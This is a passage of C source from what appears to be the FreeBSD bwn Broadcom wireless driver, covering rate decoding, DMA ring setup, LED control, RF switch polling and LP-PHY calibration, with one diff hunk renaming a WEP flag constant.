		return (BWN_OFDM_RATE_36MB);
	case 0x8:
		return (BWN_OFDM_RATE_48MB);
	case 0xc:
		return (BWN_OFDM_RATE_54MB);
	}
	device_printf(sc->sc_dev, "incorrect OFDM rate %d\n",
	    plcp->o.raw[0] & 0xf);
	return (-1);
}

static int
bwn_plcp_get_cckrate(struct bwn_mac *mac, struct bwn_plcp6 *plcp)
{
	struct bwn_softc *sc = mac->mac_sc;

	switch (plcp->o.raw[0]) {
	case 0x0a:
		return (BWN_CCK_RATE_1MB);
	case 0x14:
		return (BWN_CCK_RATE_2MB);
	case 0x37:
		return (BWN_CCK_RATE_5MB);
	case 0x6e:
		return (BWN_CCK_RATE_11MB);
	}
	device_printf(sc->sc_dev, "incorrect CCK rate %d\n", plcp->o.raw[0]);
	return (-1);
}

static void
bwn_rx_radiotap(struct bwn_mac *mac, struct mbuf *m,
    const struct bwn_rxhdr4 *rxhdr, struct bwn_plcp6 *plcp, int rate,
    int rssi, int noise)
{
	struct bwn_softc *sc = mac->mac_sc;
	const struct ieee80211_frame_min *wh;
	uint64_t tsf;
	uint16_t low_mactime_now;

	if (htole16(rxhdr->phy_status0) & BWN_RX_PHYST0_SHORTPRMBL)
		sc->sc_rx_th.wr_flags |= IEEE80211_RADIOTAP_F_SHORTPRE;

	wh = mtod(m, const struct ieee80211_frame_min *);
-	if (wh->i_fc[1] & IEEE80211_FC1_WEP)
+	if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED)
		sc->sc_rx_th.wr_flags |= IEEE80211_RADIOTAP_F_WEP;

	bwn_tsf_read(mac, &tsf);
	low_mactime_now = tsf;
	tsf = tsf & ~0xffffULL;
	tsf += le16toh(rxhdr->mac_time);
	if (low_mactime_now < le16toh(rxhdr->mac_time))
		tsf -= 0x10000;

	sc->sc_rx_th.wr_tsf = tsf;
	sc->sc_rx_th.wr_rate = rate;
	sc->sc_rx_th.wr_antsignal = rssi;
	sc->sc_rx_th.wr_antnoise = noise;
}

static void
bwn_tsf_read(struct bwn_mac *mac, uint64_t *tsf)
{
	uint32_t low, high;

	KASSERT(siba_get_revid(mac->mac_sc->sc_dev) >= 3,
	    ("%s:%d: fail", __func__, __LINE__));

	low = BWN_READ_4(mac, BWN_REV3PLUS_TSF_LOW);
	high = BWN_READ_4(mac, BWN_REV3PLUS_TSF_HIGH);
	*tsf = high;
	*tsf <<= 32;
	*tsf |= low;
}

static int
bwn_dma_attach(struct bwn_mac *mac)
{
	struct bwn_dma *dma = &mac->mac_method.dma;
	struct bwn_softc *sc = mac->mac_sc;
	bus_addr_t lowaddr = 0;
	int error;

	if (siba_get_type(sc->sc_dev) == SIBA_TYPE_PCMCIA || bwn_usedma == 0)
		return (0);

	KASSERT(siba_get_revid(sc->sc_dev) >= 5, ("%s: fail", __func__));

	mac->mac_flags |= BWN_MAC_FLAG_DMA;

	dma->dmatype = bwn_dma_gettype(mac);
	if (dma->dmatype == BWN_DMA_30BIT)
		lowaddr = BWN_BUS_SPACE_MAXADDR_30BIT;
	else if (dma->dmatype == BWN_DMA_32BIT)
		lowaddr = BUS_SPACE_MAXADDR_32BIT;
	else
		lowaddr = BUS_SPACE_MAXADDR;

	/*
	 * Create top level DMA tag
	 */
	error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev),	/* parent */
	    BWN_ALIGN, 0,		/* alignment, bounds */
	    lowaddr,			/* lowaddr */
	    BUS_SPACE_MAXADDR,		/* highaddr */
	    NULL, NULL,			/* filter, filterarg */
	    MAXBSIZE,			/* maxsize */
	    BUS_SPACE_UNRESTRICTED,	/* nsegments */
	    BUS_SPACE_MAXSIZE,		/* maxsegsize */
	    0,				/* flags */
	    NULL, NULL,			/*
	    lockfunc, lockarg */
	    &dma->parent_dtag);
	if (error) {
		device_printf(sc->sc_dev, "can't create parent DMA tag\n");
		return (error);
	}

	/*
	 * Create TX/RX mbuf DMA tag
	 */
	error = bus_dma_tag_create(dma->parent_dtag, 1, 0, BUS_SPACE_MAXADDR,
	    BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, 1,
	    BUS_SPACE_MAXSIZE_32BIT, 0, NULL, NULL, &dma->rxbuf_dtag);
	if (error) {
		device_printf(sc->sc_dev, "can't create mbuf DMA tag\n");
		goto fail0;
	}
	error = bus_dma_tag_create(dma->parent_dtag, 1, 0, BUS_SPACE_MAXADDR,
	    BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, 1,
	    BUS_SPACE_MAXSIZE_32BIT, 0, NULL, NULL, &dma->txbuf_dtag);
	if (error) {
		device_printf(sc->sc_dev, "can't create mbuf DMA tag\n");
		goto fail1;
	}

	dma->wme[WME_AC_BK] = bwn_dma_ringsetup(mac, 0, 1, dma->dmatype);
	if (!dma->wme[WME_AC_BK])
		goto fail2;
	dma->wme[WME_AC_BE] = bwn_dma_ringsetup(mac, 1, 1, dma->dmatype);
	if (!dma->wme[WME_AC_BE])
		goto fail3;
	dma->wme[WME_AC_VI] = bwn_dma_ringsetup(mac, 2, 1, dma->dmatype);
	if (!dma->wme[WME_AC_VI])
		goto fail4;
	dma->wme[WME_AC_VO] = bwn_dma_ringsetup(mac, 3, 1, dma->dmatype);
	if (!dma->wme[WME_AC_VO])
		goto fail5;
	dma->mcast = bwn_dma_ringsetup(mac, 4, 1, dma->dmatype);
	if (!dma->mcast)
		goto fail6;
	dma->rx = bwn_dma_ringsetup(mac, 0, 0, dma->dmatype);
	if (!dma->rx)
		goto fail7;
	return (error);

fail7:	bwn_dma_ringfree(&dma->mcast);
fail6:	bwn_dma_ringfree(&dma->wme[WME_AC_VO]);
fail5:	bwn_dma_ringfree(&dma->wme[WME_AC_VI]);
fail4:	bwn_dma_ringfree(&dma->wme[WME_AC_BE]);
fail3:	bwn_dma_ringfree(&dma->wme[WME_AC_BK]);
fail2:	bus_dma_tag_destroy(dma->txbuf_dtag);
fail1:	bus_dma_tag_destroy(dma->rxbuf_dtag);
fail0:	bus_dma_tag_destroy(dma->parent_dtag);
	return (error);
}

static struct bwn_dma_ring *
bwn_dma_parse_cookie(struct bwn_mac *mac, const struct bwn_txstatus *status,
    uint16_t cookie, int *slot)
{
	struct bwn_dma *dma = &mac->mac_method.dma;
	struct bwn_dma_ring *dr;
	struct bwn_softc *sc = mac->mac_sc;

	BWN_ASSERT_LOCKED(mac->mac_sc);

	switch (cookie & 0xf000) {
	case 0x1000:
		dr = dma->wme[WME_AC_BK];
		break;
	case 0x2000:
		dr = dma->wme[WME_AC_BE];
		break;
	case 0x3000:
		dr = dma->wme[WME_AC_VI];
		break;
	case 0x4000:
		dr = dma->wme[WME_AC_VO];
		break;
	case 0x5000:
		dr = dma->mcast;
		break;
	default:
		dr = NULL;
		KASSERT(0 == 1,
		    ("invalid cookie value %d", cookie & 0xf000));
	}
	*slot = (cookie & 0x0fff);
	if (*slot < 0 || *slot >= dr->dr_numslots) {
		/*
		 * XXX FIXME: the hardware sometimes reports duplicate TX DONE
		 * events carrying the same H/W sequence number; when that
		 * happens, just print a warning and ignore the event.
*/ KASSERT(status->seq == dma->lastseq, ("%s:%d: fail", __func__, __LINE__)); device_printf(sc->sc_dev, "out of slot ranges (0 < %d < %d)\n", *slot, dr->dr_numslots); return (NULL); } dma->lastseq = status->seq; return (dr); } static void bwn_dma_stop(struct bwn_mac *mac) { struct bwn_dma *dma; if ((mac->mac_flags & BWN_MAC_FLAG_DMA) == 0) return; dma = &mac->mac_method.dma; bwn_dma_ringstop(&dma->rx); bwn_dma_ringstop(&dma->wme[WME_AC_BK]); bwn_dma_ringstop(&dma->wme[WME_AC_BE]); bwn_dma_ringstop(&dma->wme[WME_AC_VI]); bwn_dma_ringstop(&dma->wme[WME_AC_VO]); bwn_dma_ringstop(&dma->mcast); } static void bwn_dma_ringstop(struct bwn_dma_ring **dr) { if (dr == NULL) return; bwn_dma_cleanup(*dr); } static void bwn_pio_stop(struct bwn_mac *mac) { struct bwn_pio *pio; if (mac->mac_flags & BWN_MAC_FLAG_DMA) return; pio = &mac->mac_method.pio; bwn_destroy_queue_tx(&pio->mcast); bwn_destroy_queue_tx(&pio->wme[WME_AC_VO]); bwn_destroy_queue_tx(&pio->wme[WME_AC_VI]); bwn_destroy_queue_tx(&pio->wme[WME_AC_BE]); bwn_destroy_queue_tx(&pio->wme[WME_AC_BK]); } static void bwn_led_attach(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; const uint8_t *led_act = NULL; uint16_t val[BWN_LED_MAX]; int i; sc->sc_led_idle = (2350 * hz) / 1000; sc->sc_led_blink = 1; for (i = 0; i < N(bwn_vendor_led_act); ++i) { if (siba_get_pci_subvendor(sc->sc_dev) == bwn_vendor_led_act[i].vid) { led_act = bwn_vendor_led_act[i].led_act; break; } } if (led_act == NULL) led_act = bwn_default_led_act; val[0] = siba_sprom_get_gpio0(sc->sc_dev); val[1] = siba_sprom_get_gpio1(sc->sc_dev); val[2] = siba_sprom_get_gpio2(sc->sc_dev); val[3] = siba_sprom_get_gpio3(sc->sc_dev); for (i = 0; i < BWN_LED_MAX; ++i) { struct bwn_led *led = &sc->sc_leds[i]; if (val[i] == 0xff) { led->led_act = led_act[i]; } else { if (val[i] & BWN_LED_ACT_LOW) led->led_flags |= BWN_LED_F_ACTLOW; led->led_act = val[i] & BWN_LED_ACT_MASK; } led->led_mask = (1 << i); if (led->led_act == BWN_LED_ACT_BLINK_SLOW || led->led_act == BWN_LED_ACT_BLINK_POLL || led->led_act == BWN_LED_ACT_BLINK) { led->led_flags |= BWN_LED_F_BLINK; if (led->led_act == BWN_LED_ACT_BLINK_POLL) led->led_flags |= BWN_LED_F_POLLABLE; else if (led->led_act == BWN_LED_ACT_BLINK_SLOW) led->led_flags |= BWN_LED_F_SLOW; if (sc->sc_blink_led == NULL) { sc->sc_blink_led = led; if (led->led_flags & BWN_LED_F_SLOW) BWN_LED_SLOWDOWN(sc->sc_led_idle); } } DPRINTF(sc, BWN_DEBUG_LED, "%dth led, act %d, lowact %d\n", i, led->led_act, led->led_flags & BWN_LED_F_ACTLOW); } callout_init_mtx(&sc->sc_led_blink_ch, &sc->sc_mtx, 0); } static __inline uint16_t bwn_led_onoff(const struct bwn_led *led, uint16_t val, int on) { if (led->led_flags & BWN_LED_F_ACTLOW) on = !on; if (on) val |= led->led_mask; else val &= ~led->led_mask; return val; } static void bwn_led_newstate(struct bwn_mac *mac, enum ieee80211_state nstate) { struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t val; int i; if (nstate == IEEE80211_S_INIT) { callout_stop(&sc->sc_led_blink_ch); sc->sc_led_blinking = 0; } if ((ic->ic_ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; val = BWN_READ_2(mac, BWN_GPIO_CONTROL); for (i = 0; i < BWN_LED_MAX; ++i) { struct bwn_led *led = &sc->sc_leds[i]; int on; if (led->led_act == BWN_LED_ACT_UNKN || led->led_act == BWN_LED_ACT_NULL) continue; if ((led->led_flags & BWN_LED_F_BLINK) && nstate != IEEE80211_S_INIT) continue; switch (led->led_act) { case BWN_LED_ACT_ON: /* Always on */ on = 1; break; case BWN_LED_ACT_OFF: /* Always off */ case 
BWN_LED_ACT_5GHZ: /* TODO: 11A */ on = 0; break; default: on = 1; switch (nstate) { case IEEE80211_S_INIT: on = 0; break; case IEEE80211_S_RUN: if (led->led_act == BWN_LED_ACT_11G && ic->ic_curmode != IEEE80211_MODE_11G) on = 0; break; default: if (led->led_act == BWN_LED_ACT_ASSOC) on = 0; break; } break; } val = bwn_led_onoff(led, val, on); } BWN_WRITE_2(mac, BWN_GPIO_CONTROL, val); } static void bwn_led_event(struct bwn_mac *mac, int event) { struct bwn_softc *sc = mac->mac_sc; struct bwn_led *led = sc->sc_blink_led; int rate; if (event == BWN_LED_EVENT_POLL) { if ((led->led_flags & BWN_LED_F_POLLABLE) == 0) return; if (ticks - sc->sc_led_ticks < sc->sc_led_idle) return; } sc->sc_led_ticks = ticks; if (sc->sc_led_blinking) return; switch (event) { case BWN_LED_EVENT_RX: rate = sc->sc_rx_rate; break; case BWN_LED_EVENT_TX: rate = sc->sc_tx_rate; break; case BWN_LED_EVENT_POLL: rate = 0; break; default: panic("unknown LED event %d\n", event); break; } bwn_led_blink_start(mac, bwn_led_duration[rate].on_dur, bwn_led_duration[rate].off_dur); } static void bwn_led_blink_start(struct bwn_mac *mac, int on_dur, int off_dur) { struct bwn_softc *sc = mac->mac_sc; struct bwn_led *led = sc->sc_blink_led; uint16_t val; val = BWN_READ_2(mac, BWN_GPIO_CONTROL); val = bwn_led_onoff(led, val, 1); BWN_WRITE_2(mac, BWN_GPIO_CONTROL, val); if (led->led_flags & BWN_LED_F_SLOW) { BWN_LED_SLOWDOWN(on_dur); BWN_LED_SLOWDOWN(off_dur); } sc->sc_led_blinking = 1; sc->sc_led_blink_offdur = off_dur; callout_reset(&sc->sc_led_blink_ch, on_dur, bwn_led_blink_next, mac); } static void bwn_led_blink_next(void *arg) { struct bwn_mac *mac = arg; struct bwn_softc *sc = mac->mac_sc; uint16_t val; val = BWN_READ_2(mac, BWN_GPIO_CONTROL); val = bwn_led_onoff(sc->sc_blink_led, val, 0); BWN_WRITE_2(mac, BWN_GPIO_CONTROL, val); callout_reset(&sc->sc_led_blink_ch, sc->sc_led_blink_offdur, bwn_led_blink_end, mac); } static void bwn_led_blink_end(void *arg) { struct bwn_mac *mac = arg; struct bwn_softc *sc = mac->mac_sc; sc->sc_led_blinking = 0; } static int bwn_suspend(device_t dev) { struct bwn_softc *sc = device_get_softc(dev); bwn_stop(sc, 1); return (0); } static int bwn_resume(device_t dev) { struct bwn_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; if (ifp->if_flags & IFF_UP) bwn_init(sc); return (0); } static void bwn_rfswitch(void *arg) { struct bwn_softc *sc = arg; struct bwn_mac *mac = sc->sc_curmac; int cur = 0, prev = 0; KASSERT(mac->mac_status >= BWN_MAC_STATUS_STARTED, ("%s: invalid MAC status %d", __func__, mac->mac_status)); if (mac->mac_phy.rf_rev >= 3 || mac->mac_phy.type == BWN_PHYTYPE_LP) { if (!(BWN_READ_4(mac, BWN_RF_HWENABLED_HI) & BWN_RF_HWENABLED_HI_MASK)) cur = 1; } else { if (BWN_READ_2(mac, BWN_RF_HWENABLED_LO) & BWN_RF_HWENABLED_LO_MASK) cur = 1; } if (mac->mac_flags & BWN_MAC_FLAG_RADIO_ON) prev = 1; if (cur != prev) { if (cur) mac->mac_flags |= BWN_MAC_FLAG_RADIO_ON; else mac->mac_flags &= ~BWN_MAC_FLAG_RADIO_ON; device_printf(sc->sc_dev, "status of RF switch is changed to %s\n", cur ? 
"ON" : "OFF"); if (cur != mac->mac_phy.rf_on) { if (cur) bwn_rf_turnon(mac); else bwn_rf_turnoff(mac); } } callout_schedule(&sc->sc_rfswitch_ch, hz); } static void bwn_phy_lp_init_pre(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_lp *plp = &phy->phy_lp; plp->plp_antenna = BWN_ANT_DEFAULT; } static int bwn_phy_lp_init(struct bwn_mac *mac) { static const struct bwn_stxtable tables[] = { { 2, 6, 0x3d, 3, 0x01 }, { 1, 12, 0x4c, 1, 0x01 }, { 1, 8, 0x50, 0, 0x7f }, { 0, 8, 0x44, 0, 0xff }, { 1, 0, 0x4a, 0, 0xff }, { 0, 4, 0x4d, 0, 0xff }, { 1, 4, 0x4e, 0, 0xff }, { 0, 12, 0x4f, 0, 0x0f }, { 1, 0, 0x4f, 4, 0x0f }, { 3, 0, 0x49, 0, 0x0f }, { 4, 3, 0x46, 4, 0x07 }, { 3, 15, 0x46, 0, 0x01 }, { 4, 0, 0x46, 1, 0x07 }, { 3, 8, 0x48, 4, 0x07 }, { 3, 11, 0x48, 0, 0x0f }, { 3, 4, 0x49, 4, 0x0f }, { 2, 15, 0x45, 0, 0x01 }, { 5, 13, 0x52, 4, 0x07 }, { 6, 0, 0x52, 7, 0x01 }, { 5, 3, 0x41, 5, 0x07 }, { 5, 6, 0x41, 0, 0x0f }, { 5, 10, 0x42, 5, 0x07 }, { 4, 15, 0x42, 0, 0x01 }, { 5, 0, 0x42, 1, 0x07 }, { 4, 11, 0x43, 4, 0x0f }, { 4, 7, 0x43, 0, 0x0f }, { 4, 6, 0x45, 1, 0x01 }, { 2, 7, 0x40, 4, 0x0f }, { 2, 11, 0x40, 0, 0x0f } }; struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; const struct bwn_stxtable *st; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; int i, error; uint16_t tmp; bwn_phy_lp_readsprom(mac); /* XXX bad place */ bwn_phy_lp_bbinit(mac); /* initialize RF */ BWN_PHY_SET(mac, BWN_PHY_4WIRECTL, 0x2); DELAY(1); BWN_PHY_MASK(mac, BWN_PHY_4WIRECTL, 0xfffd); DELAY(1); if (mac->mac_phy.rf_ver == 0x2062) bwn_phy_lp_b2062_init(mac); else { bwn_phy_lp_b2063_init(mac); /* synchronize stx table. */ for (i = 0; i < N(tables); i++) { st = &tables[i]; tmp = BWN_RF_READ(mac, st->st_rfaddr); tmp >>= st->st_rfshift; tmp <<= st->st_physhift; BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xf2 + st->st_phyoffset), ~(st->st_mask << st->st_physhift), tmp); } BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0xf0), 0x5f80); BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0xf1), 0); } /* calibrate RC */ if (mac->mac_phy.rev >= 2) bwn_phy_lp_rxcal_r2(mac); else if (!plp->plp_rccap) { if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) bwn_phy_lp_rccal_r12(mac); } else bwn_phy_lp_set_rccap(mac); error = bwn_phy_lp_switch_channel(mac, 7); if (error) device_printf(sc->sc_dev, "failed to change channel 7 (%d)\n", error); bwn_phy_lp_txpctl_init(mac); bwn_phy_lp_calib(mac); return (0); } static uint16_t bwn_phy_lp_read(struct bwn_mac *mac, uint16_t reg) { BWN_WRITE_2(mac, BWN_PHYCTL, reg); return (BWN_READ_2(mac, BWN_PHYDATA)); } static void bwn_phy_lp_write(struct bwn_mac *mac, uint16_t reg, uint16_t value) { BWN_WRITE_2(mac, BWN_PHYCTL, reg); BWN_WRITE_2(mac, BWN_PHYDATA, value); } static void bwn_phy_lp_maskset(struct bwn_mac *mac, uint16_t reg, uint16_t mask, uint16_t set) { BWN_WRITE_2(mac, BWN_PHYCTL, reg); BWN_WRITE_2(mac, BWN_PHYDATA, (BWN_READ_2(mac, BWN_PHYDATA) & mask) | set); } static uint16_t bwn_phy_lp_rf_read(struct bwn_mac *mac, uint16_t reg) { KASSERT(reg != 1, ("unaccessible register %d", reg)); if (mac->mac_phy.rev < 2 && reg != 0x4001) reg |= 0x100; if (mac->mac_phy.rev >= 2) reg |= 0x200; BWN_WRITE_2(mac, BWN_RFCTL, reg); return BWN_READ_2(mac, BWN_RFDATALO); } static void bwn_phy_lp_rf_write(struct bwn_mac *mac, uint16_t reg, uint16_t value) { KASSERT(reg != 1, ("unaccessible register %d", reg)); BWN_WRITE_2(mac, BWN_RFCTL, reg); BWN_WRITE_2(mac, BWN_RFDATALO, value); } static void bwn_phy_lp_rf_onoff(struct bwn_mac *mac, int on) { if (on) { BWN_PHY_MASK(mac, 
BWN_PHY_RF_OVERRIDE_0, 0xe0ff); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2, (mac->mac_phy.rev >= 2) ? 0xf7f7 : 0xffe7); return; } if (mac->mac_phy.rev >= 2) { BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0x83ff); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x1f00); BWN_PHY_MASK(mac, BWN_PHY_AFE_DDFS, 0x80ff); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xdfff); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2, 0x0808); return; } BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xe0ff); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x1f00); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xfcff); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2, 0x0018); } static int bwn_phy_lp_switch_channel(struct bwn_mac *mac, uint32_t chan) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_lp *plp = &phy->phy_lp; int error; if (phy->rf_ver == 0x2063) { error = bwn_phy_lp_b2063_switch_channel(mac, chan); if (error) return (error); } else { error = bwn_phy_lp_b2062_switch_channel(mac, chan); if (error) return (error); bwn_phy_lp_set_anafilter(mac, chan); bwn_phy_lp_set_gaintbl(mac, ieee80211_ieee2mhz(chan, 0)); } plp->plp_chan = chan; BWN_WRITE_2(mac, BWN_CHANNEL, chan); return (0); } static uint32_t bwn_phy_lp_get_default_chan(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; return (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan) ? 1 : 36); } static void bwn_phy_lp_set_antenna(struct bwn_mac *mac, int antenna) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_lp *plp = &phy->phy_lp; if (phy->rev >= 2 || antenna > BWN_ANTAUTO1) return; bwn_hf_write(mac, bwn_hf_read(mac) & ~BWN_HF_UCODE_ANTDIV_HELPER); BWN_PHY_SETMASK(mac, BWN_PHY_CRSGAIN_CTL, 0xfffd, antenna & 0x2); BWN_PHY_SETMASK(mac, BWN_PHY_CRSGAIN_CTL, 0xfffe, antenna & 0x1); bwn_hf_write(mac, bwn_hf_read(mac) | BWN_HF_UCODE_ANTDIV_HELPER); plp->plp_antenna = antenna; } static void bwn_phy_lp_task_60s(struct bwn_mac *mac) { bwn_phy_lp_calib(mac); } static void bwn_phy_lp_readsprom(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { plp->plp_txisoband_m = siba_sprom_get_tri2g(sc->sc_dev); plp->plp_bxarch = siba_sprom_get_bxa2g(sc->sc_dev); plp->plp_rxpwroffset = siba_sprom_get_rxpo2g(sc->sc_dev); plp->plp_rssivf = siba_sprom_get_rssismf2g(sc->sc_dev); plp->plp_rssivc = siba_sprom_get_rssismc2g(sc->sc_dev); plp->plp_rssigs = siba_sprom_get_rssisav2g(sc->sc_dev); return; } plp->plp_txisoband_l = siba_sprom_get_tri5gl(sc->sc_dev); plp->plp_txisoband_m = siba_sprom_get_tri5g(sc->sc_dev); plp->plp_txisoband_h = siba_sprom_get_tri5gh(sc->sc_dev); plp->plp_bxarch = siba_sprom_get_bxa5g(sc->sc_dev); plp->plp_rxpwroffset = siba_sprom_get_rxpo5g(sc->sc_dev); plp->plp_rssivf = siba_sprom_get_rssismf5g(sc->sc_dev); plp->plp_rssivc = siba_sprom_get_rssismc5g(sc->sc_dev); plp->plp_rssigs = siba_sprom_get_rssisav5g(sc->sc_dev); } static void bwn_phy_lp_bbinit(struct bwn_mac *mac) { bwn_phy_lp_tblinit(mac); if (mac->mac_phy.rev >= 2) bwn_phy_lp_bbinit_r2(mac); else bwn_phy_lp_bbinit_r01(mac); } static void bwn_phy_lp_txpctl_init(struct bwn_mac *mac) { struct bwn_txgain gain_2ghz = { 4, 12, 12, 0 }; struct bwn_txgain gain_5ghz = { 7, 15, 14, 0 }; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; bwn_phy_lp_set_txgain(mac, IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan) ? 
&gain_2ghz : &gain_5ghz); bwn_phy_lp_set_bbmult(mac, 150); } static void bwn_phy_lp_calib(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; const struct bwn_rxcompco *rc = NULL; struct bwn_txgain ogain; int i, omode, oafeovr, orf, obbmult; uint8_t mode, fc = 0; if (plp->plp_chanfullcal != plp->plp_chan) { plp->plp_chanfullcal = plp->plp_chan; fc = 1; } bwn_mac_suspend(mac); /* BlueTooth Coexistance Override */ BWN_WRITE_2(mac, BWN_BTCOEX_CTL, 0x3); BWN_WRITE_2(mac, BWN_BTCOEX_TXCTL, 0xff); if (mac->mac_phy.rev >= 2) bwn_phy_lp_digflt_save(mac); bwn_phy_lp_get_txpctlmode(mac); mode = plp->plp_txpctlmode; bwn_phy_lp_set_txpctlmode(mac, BWN_PHYLP_TXPCTL_OFF); if (mac->mac_phy.rev == 0 && mode != BWN_PHYLP_TXPCTL_OFF) bwn_phy_lp_bugfix(mac); if (mac->mac_phy.rev >= 2 && fc == 1) { bwn_phy_lp_get_txpctlmode(mac); omode = plp->plp_txpctlmode; oafeovr = BWN_PHY_READ(mac, BWN_PHY_AFE_CTL_OVR) & 0x40; if (oafeovr) ogain = bwn_phy_lp_get_txgain(mac); orf = BWN_PHY_READ(mac, BWN_PHY_RF_PWR_OVERRIDE) & 0xff; obbmult = bwn_phy_lp_get_bbmult(mac); bwn_phy_lp_set_txpctlmode(mac, BWN_PHYLP_TXPCTL_OFF); if (oafeovr) bwn_phy_lp_set_txgain(mac, &ogain); bwn_phy_lp_set_bbmult(mac, obbmult); bwn_phy_lp_set_txpctlmode(mac, omode); BWN_PHY_SETMASK(mac, BWN_PHY_RF_PWR_OVERRIDE, 0xff00, orf); } bwn_phy_lp_set_txpctlmode(mac, mode); if (mac->mac_phy.rev >= 2) bwn_phy_lp_digflt_restore(mac); /* do RX IQ Calculation; assumes that noise is true. */ if (siba_get_chipid(sc->sc_dev) == 0x5354) { for (i = 0; i < N(bwn_rxcompco_5354); i++) { if (bwn_rxcompco_5354[i].rc_chan == plp->plp_chan) rc = &bwn_rxcompco_5354[i]; } } else if (mac->mac_phy.rev >= 2) rc = &bwn_rxcompco_r2; else { for (i = 0; i < N(bwn_rxcompco_r12); i++) { if (bwn_rxcompco_r12[i].rc_chan == plp->plp_chan) rc = &bwn_rxcompco_r12[i]; } } if (rc == NULL) goto fail; BWN_PHY_SETMASK(mac, BWN_PHY_RX_COMP_COEFF_S, 0xff00, rc->rc_c1); BWN_PHY_SETMASK(mac, BWN_PHY_RX_COMP_COEFF_S, 0x00ff, rc->rc_c0 << 8); bwn_phy_lp_set_trsw_over(mac, 1 /* TX */, 0 /* RX */); if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x8); BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xfff7, 0); } else { BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x20); BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xffdf, 0); } bwn_phy_lp_set_rxgain(mac, 0x2d5d); BWN_PHY_MASK(mac, BWN_PHY_AFE_CTL_OVR, 0xfffe); BWN_PHY_MASK(mac, BWN_PHY_AFE_CTL_OVRVAL, 0xfffe); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x800); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0x800); bwn_phy_lp_set_deaf(mac, 0); /* XXX no checking return value? */ (void)bwn_phy_lp_calc_rx_iq_comp(mac, 0xfff0); bwn_phy_lp_clear_deaf(mac, 0); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_0, 0xfffc); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_0, 0xfff7); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_0, 0xffdf); /* disable RX GAIN override. 
*/ BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_0, 0xfffe); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_0, 0xffef); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_0, 0xffbf); if (mac->mac_phy.rev >= 2) { BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2, 0xfeff); if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2, 0xfbff); BWN_PHY_MASK(mac, BWN_PHY_OFDM(0xe5), 0xfff7); } } else { BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2, 0xfdff); } BWN_PHY_MASK(mac, BWN_PHY_AFE_CTL_OVR, 0xfffe); BWN_PHY_MASK(mac, BWN_PHY_AFE_CTL_OVRVAL, 0xf7ff); fail: bwn_mac_enable(mac); } static void bwn_phy_lp_switch_analog(struct bwn_mac *mac, int on) { if (on) { BWN_PHY_MASK(mac, BWN_PHY_AFE_CTL_OVR, 0xfff8); return; } BWN_PHY_SET(mac, BWN_PHY_AFE_CTL_OVRVAL, 0x0007); BWN_PHY_SET(mac, BWN_PHY_AFE_CTL_OVR, 0x0007); } static int bwn_phy_lp_b2063_switch_channel(struct bwn_mac *mac, uint8_t chan) { static const struct bwn_b206x_chan *bc = NULL; struct bwn_softc *sc = mac->mac_sc; uint32_t count, freqref, freqvco, freqxtal, val[3], timeout, 